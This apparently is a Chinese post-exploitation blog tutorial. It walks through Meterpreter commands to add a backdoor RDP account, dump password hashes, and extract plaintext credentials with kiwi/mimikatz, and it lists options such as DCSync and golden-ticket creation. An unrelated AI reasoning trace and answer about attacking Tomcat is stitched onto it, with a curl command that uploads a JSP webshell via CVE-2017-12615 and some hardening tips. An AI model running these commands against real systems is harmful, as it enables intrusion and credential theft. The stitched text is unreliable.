后渗透攻击(三)

目录

1、创建新账户

2、获取账号密码

3、远程屏幕控制


在进行提权后我们的操作空间就会大很多,可以进行一系列的创建新账户、获取账号密码、远程操控屏幕等等的操作。该文章就对一些常用的操作进行了整理。

1、创建新账户

查看目标靶机已存在用户  可以在meterpreter中输入:

run  post/windows/gather/enum_logged_on_users ,可见本来只有一个账户,

我们接着用run post/windows/manage/enable_rdp USERNAME= PASSWORD=的指令去自己创建一个账户。

再用上面的指令去查看可能会有延迟,所以我们可以直接去靶机查看,进入win的运行输入netplwiz 可以查看账户创建情况,发现确实多了一个hacker的账户。

 

2、获取账号密码

2.1

很多人喜欢给在计算机设置自动登录 我们可以通过抓取自动登录的账户密码

run windows/gather/credentials/windows_autologin

2.2

如果提示这证明本机并没有配置自动登录

还可以通过导出SAM数据库中的本地用户账号

run post/windows/gather/smart_hashdump

使用  hashdump 获取密码

终端内输入  run hashdump即可,接下来便是通过在线hash来破解即可。

2.3

使用load kiwi

kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用

 终端输入  load kiwi

creds_all  直接获取密码

也可使用kiwi_cmd sekurlsa::logonpasswords  获取密码

***

| ID   | kiwi参数和描述                                         |

| ---- | ------------------------------------------------------ |

| 1    | creds_all:列举所有凭据                                |

| 2    | creds_kerberos:列举所有kerberos凭据                   |

| 3    | creds_msv:列举所有msv凭据                             |

| 4    | creds_ssp:列举所有ssp凭据                             |

| 5    | creds_tspkg:列举所有tspkg凭据                         |

| 6    | creds_wdigest:列举所有wdigest凭据                     |

| 7    | dcsync:通过DCSync检索用户帐户信息                     |

| 8    | dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID  |

| 9    | golden_ticket_create:创建黄金票据                     |

| 10   | kerberos_ticket_list:列举kerberos票据                 |

| 11   | kerberos_ticket_purge:清除kerberos票据                |

| 12   | kerberos_ticket_use:使用kerberos票据                  |

| 13   | kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令 |

| 14   | lsa_dump_sam:dump出lsa的SAM                           |

| 15   | lsa_dump_secrets:dump出lsa的密文                      |

| 16   | password_change:修改密码                              |

| 17   | wifi_list:列出当前用户的wifi配置文件                  |

| 18   | wifi_list_shared:列出共享wifi配置文件/编码

***

3、远程屏幕控制

rdesktop是linux下支持Windows远程桌面连接的客户端程序,在linux系统下可通过它远程访问Windows桌面,支持多种版本。rdesktop是sourceforge下支持GPL协议的一个开源项目,采用RDP(Remote Desktop Protocol,远程桌面协议),几乎可以连接windows的所有版本

在一个新的root界面去执行

rdesktop -u 用户名 -p  密码  -f   IP

即可。

如:

rdesktop -u hacker -p 123456   -g 1024x720 172.16.98.175

 

rdesktop常用参数

| id   | 参数        | 描述                                            |

| ---- | ----------- | ----------------------------------------------- |

| 1    | -u          | 账户名                                          |

| 2    | -p          | 密码                                            |

| 3    | -a 16       | 指使用16位色显示远程画面                        |

| 4    | -f          | 全屏模式(用**Ctrl+Alt+Enter** 组合键退出全屏) |

| 5    | -g          | 设置分辨率 如 :   -g 1024x768                   |

| 6    | rdesktop -h | 查看rdesktop使用帮助                            |

<think>好的,用户让我介绍一下渗透攻击Tomcat的方法。首先,我需要确保自己理解Tomcat是什么。Tomcat是Apache软件基金会的一个开源Java Servlet容器,通常用于部署和运行Java Web应用程序。作为常见的中间件,它可能成为攻击者的目标,尤其是如果配置不当的话。 接下来,用户提到的“渗透攻击”可能指的是如何识别和利用Tomcat中的安全漏洞。首先,我需要考虑常见的Tomcat漏洞类型。例如,默认配置弱口令、未授权访问、版本过低的漏洞,比如CVE-2017-12615(远程代码执行)等。 然后,我需要分步骤解释渗透测试的流程。通常包括信息收集、漏洞扫描、漏洞利用、权限提升和维持访问。对于Tomcat,信息收集可能涉及端口扫描(默认8080端口),识别Tomcat版本,管理界面路径(如/manager/html)。 漏洞扫描部分,可以提到使用工具如Nmap的脚本(http-vuln-*)或者专门针对Tomcat的漏洞检测工具。比如检查是否存在PUT方法漏洞,或者管理界面是否暴露。 漏洞利用方面,比如利用弱口令登录管理界面,部署恶意的WAR文件进行远程代码执行。或者利用CVE-2017-12615通过PUT方法上传JSP木马。 权限提升可能涉及利用服务器上的其他漏洞,比如提权到root或系统权限。维持访问可能包括创建后门账户,安装Web Shell等。 同时,必须强调合法性和道德性,未经授权的渗透测试是非法的。应该建议用户在授权范围内进行测试,并给出加固建议,如更改默认密码,限制管理界面访问,及时更新版本等。 需要注意的是,用户可能对渗透测试的具体技术细节感兴趣,但作为回答者,应该避免提供可用于非法攻击的详细步骤,而是侧重在防御和加固措施上。此外,确保回答中提到的漏洞是公开的,并且提供解决方案,帮助用户提高安全意识。 可能用户是安全研究人员或系统管理员,希望了解如何保护Tomcat服务器。因此,在介绍渗透方法时,重点应放在识别漏洞和防护措施,而不是详细的攻击步骤。同时,需要提醒用户遵循法律法规,只在授权环境下进行测试。 最后,确保回答结构清晰,分步骤说明,并正确使用LaTeX格式,特别是变量和代码部分需要用行内公式标记。例如,提到版本号时使用$v9.0.0$,端口号$8080$,路径如/manager/html等。</think>### 渗透攻击Tomcat的基本原理与防护建议 Tomcat作为广泛使用的Java Web中间件,常因配置不当或版本漏洞成为攻击目标。以下从渗透测试角度简要说明常见攻击路径,并重点强调防御措施(注:本文仅用于安全研究,禁止非法使用)。 --- #### 一、常见攻击面分析 1. **信息收集** - 端口扫描:Tomcat默认使用$8080$端口,可通过`nmap -p 8080 <target>`识别 - 版本探测:通过HTTP响应头`Server: Apache-Coyote/1.1`或`/manager/html`页面获取版本(如$v9.0.0$) 2. **管理后台暴露** 默认管理路径: $$ \text{/manager/html(部署应用)}, \quad \text{/host-manager/html(虚拟主机管理)} $$ 3. **弱口令爆破** 尝试默认凭证(如`admin:admin`、`tomcat:tomcat`),或使用字典攻击。 --- #### 二、典型漏洞示例 1. **CVE-2017-12615(PUT方法任意文件上传)** - **漏洞条件**:Tomcat $≤9.0.0$,启用HTTP PUT方法 - **利用方式**: ```bash curl -X PUT http://target:8080/shell.jsp/ --data-binary @webshell.jsp ``` 2. **后台部署WAR木马** - 通过`/manager/html`上传恶意WAR包,自动解压执行代码 - 需绕过弱口令或会话劫持 --- #### 、防御加固建议 1. **访问控制** - 限制管理后台IP访问(修改`conf/server.xml`): ```xml <Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="192.168.1.0/24" /> ``` - 禁用PUT/DELETE方法(`conf/web.xml`中注释对应配置) 2. **认证强化** - 修改默认账号密码(`conf/tomcat-users.xml`) - 启用强密码策略(长度≥12,含大小写字母、数字、符号) 3. **版本与配置** - 及时升级到最新稳定版(当前推荐$≥v10.1.0$) - 关闭调试模式(`org.apache.catalina.valves.ErrorReportValve`设置`showReport=false`) --- #### 四、渗透测试合法性声明 任何渗透测试必须遵守《网络安全法》并获得**书面授权**。非法入侵将面临刑事责任(《刑法》第285条)。 > 提示:企业可通过定期漏洞扫描(如Nessus、OpenVAS)和代码审计(如Fortify)主动防御攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值